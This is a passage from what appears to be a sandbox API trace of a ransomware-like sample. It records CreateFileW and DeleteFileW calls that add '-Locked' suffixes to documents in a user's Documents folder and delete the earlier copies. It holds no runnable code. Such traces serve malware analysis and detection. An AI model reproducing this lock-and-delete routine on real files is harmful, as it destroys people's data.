lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.230] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.230] GetFileType (hFile=0x49c) returned 0x1 [0302.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.230] GetFileType (hFile=0x49c) returned 0x1 [0302.232] CloseHandle (hObject=0x49c) returned 1 [0302.232] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", lpFilePart=0x0) returned 0x3e [0302.232] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked")) returned 1 [0302.233] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0302.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.233] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.234] GetFileType (hFile=0x49c) returned 0x1 [0302.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.234] GetFileType (hFile=0x49c) returned 0x1 [0302.235] CloseHandle (hObject=0x49c) returned 1 [0302.236] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0302.236] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked-locked")) returned 1 [0302.236] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", lpFilePart=0x0) returned 0x43 [0302.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.237] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.237] GetFileType (hFile=0x49c) returned 0x1 [0302.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.237] GetFileType (hFile=0x49c) returned 0x1 [0302.238] CloseHandle (hObject=0x49c) returned 1 [0302.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", lpFilePart=0x0) returned 0x3c [0302.239] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked")) returned 1 [0302.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0302.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.239] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.240] GetFileType (hFile=0x49c) returned 0x1 [0302.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.240] GetFileType (hFile=0x49c) returned 0x1 [0302.241] CloseHandle (hObject=0x49c) returned 1 [0302.242] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked", lpFilePart=0x0) returned 0x43 [0302.242] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked-locked")) returned 1 [0302.242] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0302.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.242] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.243] GetFileType (hFile=0x49c) returned 0x1 [0302.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.243] GetFileType (hFile=0x49c) returned 0x1 [0302.244] CloseHandle (hObject=0x49c) returned 1 [0302.245] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", lpFilePart=0x0) returned 0x30 [0302.245] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked")) returned 1 [0302.246] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0302.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.246] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.247] GetFileType (hFile=0x49c) returned 0x1 [0302.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.247] GetFileType (hFile=0x49c) returned 0x1 [0302.249] CloseHandle (hObject=0x49c) returned 1 [0302.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0302.249] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked-locked")) returned 1 [0302.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x40 [0302.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.250] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.250] GetFileType (hFile=0x49c) returned 0x1 [0302.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.250] GetFileType (hFile=0x49c) returned 0x1 [0302.252] CloseHandle (hObject=0x49c) returned 1 [0302.252] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", lpFilePart=0x0) returned 0x39 [0302.252] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked")) returned 1 [0302.253] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x47 [0302.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.253] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.254] GetFileType (hFile=0x49c) returned 0x1 [0302.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.254] GetFileType (hFile=0x49c) returned 0x1 [0302.255] CloseHandle (hObject=0x49c) returned 1 [0302.255] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x40 [0302.255] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked-locked")) returned 1 [0302.256] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x39 [0302.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.256] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.257] GetFileType (hFile=0x49c) returned 0x1 [0302.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.257] GetFileType (hFile=0x49c) returned 0x1 [0302.258] CloseHandle (hObject=0x49c) returned 1 [0302.259] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0302.259] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked")) returned 1 [0302.259] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked", lpFilePart=0x0) returned 0x40 [0302.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.259] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.285] GetFileType (hFile=0x49c) returned 0x1 [0302.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.285] GetFileType (hFile=0x49c) returned 0x1 [0302.287] CloseHandle (hObject=0x49c) returned 1 [0302.289] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x39 [0302.289] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked-locked")) returned 1 [0302.290] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.290] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.290] GetFileType (hFile=0x49c) returned 0x1 [0302.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.290] GetFileType (hFile=0x49c) returned 0x1 [0302.292] CloseHandle (hObject=0x49c) returned 1 [0302.292] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0302.293] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked")) returned 1 [0302.293] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0302.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.293] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.294] GetFileType (hFile=0x49c) returned 0x1 [0302.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.294] GetFileType (hFile=0x49c) returned 0x1 [0302.296] CloseHandle (hObject=0x49c) returned 1 [0302.297] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.297] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked")) returned 1 [0302.297] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.297] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.298] GetFileType (hFile=0x49c) returned 0x1 [0302.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.298] GetFileType (hFile=0x49c) returned 0x1 [0302.303] CloseHandle (hObject=0x49c) returned 1 [0302.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0302.303] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked")) returned 1 [0302.304] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0302.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.304] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.305] GetFileType (hFile=0x49c) returned 0x1 [0302.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.305] GetFileType (hFile=0x49c) returned 0x1 [0302.307] CloseHandle (hObject=0x49c) returned 1 [0302.307] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.307] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked")) returned 1 [0302.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.309] GetFileType (hFile=0x49c) returned 0x1 [0302.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.309] GetFileType (hFile=0x49c) returned 0x1 [0302.311] CloseHandle (hObject=0x49c) returned 1 [0302.311] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", lpFilePart=0x0) returned 0x3f [0302.311] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked")) returned 1 [0302.313] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0302.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.313] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.316] GetFileType (hFile=0x49c) returned 0x1 [0302.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.316] GetFileType (hFile=0x49c) returned 0x1 [0302.318] CloseHandle (hObject=0x49c) returned 1 [0302.319] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.319] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked")) returned 1 [0302.320] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked", lpFilePart=0x0) returned 0x3a [0302.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.320] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 